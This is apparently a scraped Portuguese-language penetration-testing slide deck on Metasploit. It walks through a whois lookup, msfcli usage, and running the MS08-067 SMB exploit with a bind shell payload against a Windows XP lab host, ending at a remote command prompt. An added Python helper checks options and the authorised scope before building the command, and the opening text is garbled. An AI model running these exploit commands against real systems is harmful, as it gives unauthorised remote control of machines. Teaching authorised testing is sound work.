msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups
Page 7: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3

Sample Usage

root@bt:~# msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    0.0.0.0          yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

You can see that the module requires three options: RHOST, RPORT and SMBPIPE. Now, by adding a P, we can check for available payloads:

root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 P
[*] Please wait while we load the module tree...

Compatible payloads
===================

   Name                    Description
   ----                    -----------
   generic/debug_trap      Generate a debug trap in the target process
   generic/shell_bind_tcp  Listen for a connection and spawn a command shell

Having set all the required options for our exploit and selected a payload, we can run the exploit by passing the letter E at the end of the msfcli argument string, as shown on the next slide.

REMOTE WINDOWS PROMPT

root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.101:46025 -> 192.168.1.155:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

We're successful! Note that windows/shell/bind_tcp makes the target listen (here on TCP 4444, the default LPORT) and the attacking host connects in, which is what the "Started bind handler" line and the 192.168.1.101:46025 -> 192.168.1.155:4444 session show; a bind payload therefore only works when that port on the target is reachable from your host.
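Before passing E to msfcli there are two things the slides take for granted that are worth checking mechanically: every option marked Required has a real value (RHOST starts at the 0.0.0.0 placeholder), and the target address lies inside the range you have written permission to test. The Python below is an added example, not code from the slides or from the Metasploit project: it parses the option table printed by the O mode (OPTIONS_OUTPUT is constructed from the slide), reports required options that are still unset, checks RHOST against an assumed in-scope network (192.168.1.0/24 here is an assumption), and only then assembles the msfcli argument list. It builds the command but never executes it.

```python
"""Sanity-check msfcli options and scope before building the E (execute) command line.
Added example, not code from the slides or the Metasploit project."""
import ipaddress
import re

# Constructed sample: the option table printed by `msfcli windows/smb/ms08_067_netapi O`
# on the slide.
OPTIONS_OUTPUT = """\
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    0.0.0.0          yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
"""

# One table row: NAME  <current setting, possibly blank>  yes|no  description.
# The header row does not match because "Name" is not all upper-case.
ROW_RE = re.compile(r"^\s*([A-Z][A-Z0-9_]*)\s+(\S*)\s+(yes|no)\s+(.*?)\s*$")

# Values msfcli may print as a "current setting" that do not name a real target.
PLACEHOLDERS = {"", "0.0.0.0"}


def parse_options(output):
    """Map option name -> {current, required, description} from the O-mode table."""
    options = {}
    for line in output.splitlines():
        m = ROW_RE.match(line)
        if m:
            name, current, required, description = m.groups()
            options[name] = {
                "current": current,
                "required": required == "yes",
                "description": description,
            }
    return options


def missing_required(options, overrides):
    """Required options still unset (or at a placeholder) after applying key=value overrides."""
    missing = []
    for name, opt in options.items():
        value = overrides.get(name, opt["current"])
        if opt["required"] and value in PLACEHOLDERS:
            missing.append(name)
    return missing


def in_scope(address, scope_networks):
    """True when the target address falls inside one of the authorised networks."""
    ip = ipaddress.ip_address(address)
    return any(ip in ipaddress.ip_network(net, strict=False) for net in scope_networks)


def build_msfcli_argv(module, options, overrides, payload, scope_networks, mode="E"):
    """Return argv for `msfcli <module> key=value ... PAYLOAD=<payload> <mode>`,
    refusing when a required option is unset or RHOST is outside the authorised scope.
    Nothing is executed here; the caller decides whether to run it."""
    missing = missing_required(options, overrides)
    if missing:
        raise ValueError("required options not set: " + ", ".join(missing))
    rhost = overrides.get("RHOST", options["RHOST"]["current"])
    if not in_scope(rhost, scope_networks):
        raise ValueError(f"RHOST {rhost} is outside the authorised scope {scope_networks}")
    argv = ["msfcli", module]
    argv += [f"{name}={value}" for name, value in overrides.items()]
    argv += [f"PAYLOAD={payload}", mode]
    return argv


if __name__ == "__main__":
    opts = parse_options(OPTIONS_OUTPUT)
    scope = ["192.168.1.0/24"]          # assumed authorised range for the demo
    print("still unset:", missing_required(opts, {}))   # RHOST is at the placeholder
    print(" ".join(build_msfcli_argv("windows/smb/ms08_067_netapi", opts,
                                     {"RHOST": "192.168.1.155"},
                                     "windows/shell/bind_tcp", scope)))
```

The scope check is deliberately a hard failure rather than a warning: the slide's own rule is no targets without written permission, and a typo in RHOST is the usual way that rule gets broken by accident.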

Running Armitage

To launch Armitage, run the command armitage. During startup, select Start MSF, which lets Armitage connect to your Metasploit instance:

root@bt:/opt/framework3/msf3# armitage
